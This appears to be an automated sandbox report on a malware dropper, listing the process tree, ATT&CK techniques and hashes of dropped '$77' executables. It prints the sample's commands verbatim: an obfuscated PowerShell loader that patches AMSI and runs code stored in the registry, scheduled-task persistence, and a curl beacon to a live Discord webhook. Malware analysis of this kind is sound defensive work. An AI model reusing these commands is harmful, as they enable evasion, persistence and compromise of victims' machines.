C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe"'5⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\TEMP\tmpA9FB.tmp.bat""4⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:HYFdDFDTpyLF{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kzdYLOBIQUGoND,[Parameter(Position=1)][Type]$RFcHZzaONv)$kBhbHTEolUP=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+'l'+'e'+'c'+[Char](116)+''+'e'+'d'+[Char](68)+''+[Char](101)+'l'+'e'+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+'r'+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+'l'+'e',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+'el'+'e'+''+[Char](103)+''+[Char](97)+''+'t'+'e'+[Char](84)+''+[Char](121)+'p'+'e'+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+','+''+[Char](83)+''+'e'+''+'a'+''+[Char](108)+'e'+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+'ut'+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$kBhbHTEolUP.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+'e'+''+[Char](99)+''+'i'+'a'+'l'+'N'+[Char](97)+'m'+'e'+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+'bli'+'c'+'',[Reflection.CallingConventions]::Standard,$kzdYLOBIQUGoND).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+'t'+[Char](105)+''+'m'+''+[Char](101)+','+'M'+''+[Char](97)+''+'n'+'a'+'g'+''+[Char](101)+''+[Char](100)+'');$kBhbHTEolUP.DefineMethod('I'+'n'+''+[Char](118)+''+'o'+''+'k'+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+',H'+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+'i'+''+'g'+''+[Char](44)+''+'N'+''+'e'+'w'+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+'i'+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$RFcHZzaONv,$kzdYLOBIQUGoND).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+',M'+[Char](97)+'n'+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $kBhbHTEolUP.CreateType();}$sweZnEGrkVLkX=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+'e'+''+'m'+''+[Char](46)+''+[Char](100)+'l'+'l'+'')}).GetType('Mi'+'c'+'r'+'o'+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+'2'+''+'.'+''+[Char](85)+''+'n'+''+[Char](115)+'af'+[Char](101)+''+[Char](78)+''+[Char](97)+'t'+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+'t'+[Char](104)+''+[Char](111)+''+'d'+'s');$EpMjWwMHmylFWv=$sweZnEGrkVLkX.GetMethod('Get'+'P'+'r'+[Char](111)+''+[Char](99)+'A'+[Char](100)+'d'+'r'+'e'+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+'a'+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$BYqbBcnCXGWvuPcKYXw=HYFdDFDTpyLF @([String])([IntPtr]);$KrlzDjBxAwVYdEORYoHyUX=HYFdDFDTpyLF @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$beFIbIsMbYj=$sweZnEGrkVLkX.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+'eH'+[Char](97)+''+[Char](110)+''+[Char](100)+'l'+'e'+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+'n'+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+'.d'+[Char](108)+'l')));$TQsUUPEUmAKZKo=$EpMjWwMHmylFWv.Invoke($Null,@([Object]$beFIbIsMbYj,[Object](''+[Char](76)+''+[Char](111)+'a'+'d'+'L'+[Char](105)+'b'+[Char](114)+'a'+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$jljYdLiNhUbrXalZm=$EpMjWwMHmylFWv.Invoke($Null,@([Object]$beFIbIsMbYj,[Object]('Vi'+[Char](114)+'tu'+'a'+''+'l'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'t'+''+'e'+''+'c'+''+[Char](116)+'')));$gWZHett=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TQsUUPEUmAKZKo,$BYqbBcnCXGWvuPcKYXw).Invoke('am'+[Char](115)+''+[Char](105)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'');$jKUEWHcKZfelKnHjH=$EpMjWwMHmylFWv.Invoke($Null,@([Object]$gWZHett,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+'B'+''+[Char](117)+'f'+[Char](102)+''+[Char](101)+'r')));$tbryIxHVtp=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jljYdLiNhUbrXalZm,$KrlzDjBxAwVYdEORYoHyUX).Invoke($jKUEWHcKZfelKnHjH,[uint32]8,4,[ref]$tbryIxHVtp);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$jKUEWHcKZfelKnHjH,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jljYdLiNhUbrXalZm,$KrlzDjBxAwVYdEORYoHyUX).Invoke($jKUEWHcKZfelKnHjH,[uint32]8,0x20,[ref]$tbryIxHVtp);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+'T'+'WA'+'R'+'E').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+'st'+[Char](97)+''+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Users\Admin\AppData\Roaming\$77-scchost.exeC:\Users\Admin\AppData\Roaming\$77-scchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\$77-scchost.exeC:\Users\Admin\AppData\Roaming\$77-scchost.exe2⤵
- Executes dropped EXE
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\Dropper Builder.exe"C:\Users\Admin\AppData\Local\Temp\Dropper Builder.exe"2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\curl.execurl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"4⤵
-
C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Users\Admin\AppData\Roaming\$77-scchost.exe"4⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"'5⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9F0F.tmp.bat""4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\$77-install.exe"C:\Users\Admin\AppData\Local\Temp\$77-install.exe"3⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get UUID3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get UUID UUID3⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Writes to the Master Boot Record (MBR)
- Enumerates system info in registry
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 879d428bfc393a7980661c64eb6fdfe8 XlE41ATQV0aVT9QlSRxzIw.0.1.0.0.01⤵
- Sets service image path in registry
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77-scchost.exe.logFilesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
C:\Users\Admin\AppData\Local\Temp\$77-aachost.exeFilesize
66KB
MD5f10712f4faa374be8f37668c5ebed4a6
SHA1bb30e941c4f91ae3178539e993abecbfd838fdb0
SHA256d66c793c2e3290b3996b54f5a2fc2c1973fc41677ec46ce0e0e30aa4e7916acf
SHA512cb838ec3d65ca49bb25bd93e06666e6c2640c66fd0b68fc826ca763a3dedcc4d4033abab7cfca2fff3bf08ed98d14533abf19026fd9d1845dbf09fcb241840ac
-
C:\Users\Admin\AppData\Local\Temp\$77-install.exeFilesize
163KB
MD51a7d1b5d24ba30c4d3d5502295ab5e89
SHA12d5e69cf335605ba0a61f0bbecbea6fc06a42563
SHA256b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5
SHA512859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa
-
C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exeFilesize
256KB
MD518f497deffe88b6b2cff336a277aface
SHA14e1413241d3d3e4dbff399d179f8fd64f3ecd39e
SHA2568133c3c1e5dde7c9b4d9d5c9a07e37b733fd0223fc9d035c3f386f034a434af5
SHA51235c804ec73001fe66d57bd2fadc51cd399edbc2e550c4257f29aac5a24a9f9c030c582d50239dec41605801263fd5739444aa14f9683f99f726152cc1bb6920d
-
C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exeFilesize
50KB
MD577a71f3a441aa3bf824967e52413bec5
SHA1c3d6df5cfc5eefaadf9bcb3703484e3cadf79588
SHA2561e6c87e492d90fbc4b9d2a16676a58735e33861f780c6c3020869337a0ccfc82
SHA51231c413cb410b366b63f0e763e288c2795584f9c7fda41eeea45f7d32a853da87e3ab58a144ff02a75b1d1803c7fef9fe3d561133a50a4e600799ed6f9050fd5b
-
C:\Users\Admin\AppData\Local\Temp\tmp9F0F.tmp.batFilesize
155B
MD564066edfd8c8c9d8c6b0f9ad4d7e7b7b
SHA1c0e0caf9de83e7044baa3067e8ed0d6045fa91af
SHA25697bef182a4f189659dc3f29b390d2982929a53363d52ed0ae538e5557ebe4275
SHA5124539c27e7d19d92c6ae78eaed456b8884363a7b5b02e6555755785ccdd826fbd47712c04b1f176103eb6a4d2a89a0bccb0ebadd2005a116ea355eb51b5c098dd
-
C:\Windows\TEMP\tmpA9FB.tmp.batFilesize
163B
MD582cff771f5910f91493b9b5c0f51964a
SHA1acda34e036c3296d4eb456b84d5fc14dedfe750f
SHA2566293b9d57282dbb904f2a942282302a7c8290f70a006430abd6d5ad26f81aba7
SHA512ed5445c39f53ee604ee2c8d8ee83a3787abf6f3e797f7ffefde85b9d7642f7bc072ad34e6a30c69df41b9e4a75ec9fa14aed7897ca9510f7d60797b25e4e202f
-
C:\Windows\Temp\__PSScriptPolicyTest_04qlnryp.xkw.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/380-285-0x000001BAD9AB0000-0x000001BAD9ADB000-memory.dmpFilesize
172KB
-
memory/380-291-0x000001BAD9AB0000-0x000001BAD9ADB000-memory.dmpFilesize
172KB
-
memory/380-292-0x00007FFB76F10000-0x00007FFB76F20000-memory.dmpFilesize
64KB
-
memory/436-237-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/436-247-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/436-235-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/436-241-0x00007FFBB6C70000-0x00007FFBB6D2E000-memory.dmpFilesize
760KB
-
memory/436-240-0x00007FFBB6E90000-0x00007FFBB7085000-memory.dmpFilesize
2.0MB
-
memory/436-239-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/436-236-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/436-234-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/612-250-0x0000013971180000-0x00000139711A5000-memory.dmpFilesize
148KB
-
memory/612-251-0x00000139711B0000-0x00000139711DB000-memory.dmpFilesize
172KB
-
memory/612-252-0x00000139711B0000-0x00000139711DB000-memory.dmpFilesize
172KB
-
memory/612-258-0x00000139711B0000-0x00000139711DB000-memory.dmpFilesize
172KB
-
memory/612-259-0x00007FFB76F10000-0x00007FFB76F20000-memory.dmpFilesize
64KB
-
memory/668-270-0x00007FFB76F10000-0x00007FFB76F20000-memory.dmpFilesize
64KB
-
memory/668-264-0x000001CEE0E50000-0x000001CEE0E7B000-memory.dmpFilesize
172KB
-
memory/668-269-0x000001CEE0E50000-0x000001CEE0E7B000-memory.dmpFilesize
172KB
-
memory/732-296-0x00000127AE4F0000-0x00000127AE51B000-memory.dmpFilesize
172KB
-
memory/952-280-0x00000226FBFD0000-0x00000226FBFFB000-memory.dmpFilesize
172KB
-
memory/952-274-0x00000226FBFD0000-0x00000226FBFFB000-memory.dmpFilesize
172KB
-
memory/952-281-0x00007FFB76F10000-0x00007FFB76F20000-memory.dmpFilesize
64KB
-
memory/2840-233-0x00007FFBB6C70000-0x00007FFBB6D2E000-memory.dmpFilesize
760KB
-
memory/2840-225-0x000001A81BB30000-0x000001A81BB52000-memory.dmpFilesize
136KB
-
memory/2840-232-0x00007FFBB6E90000-0x00007FFBB7085000-memory.dmpFilesize
2.0MB
-
memory/2840-231-0x000001A8344F0000-0x000001A83451A000-memory.dmpFilesize
168KB
-
memory/2932-0-0x0000000074D2E000-0x0000000074D2F000-memory.dmpFilesize
4KB
-
memory/2932-1104-0x0000000074D2E000-0x0000000074D2F000-memory.dmpFilesize
4KB
-
memory/2932-1-0x0000000000620000-0x00000000018C0000-memory.dmpFilesize
18.6MB
-
memory/3984-113-0x0000000000340000-0x0000000000352000-memory.dmpFilesize
72KB
-
memory/3984-65-0x00007FFB974D3000-0x00007FFB974D5000-memory.dmpFilesize
8KB
-
memory/4280-219-0x00000000010B0000-0x00000000010B6000-memory.dmpFilesize
24KB
-
memory/4280-208-0x00000000007C0000-0x0000000000806000-memory.dmpFilesize
280KB
-
memory/4576-127-0x0000000000A30000-0x0000000000A46000-memory.dmpFilesize
88KB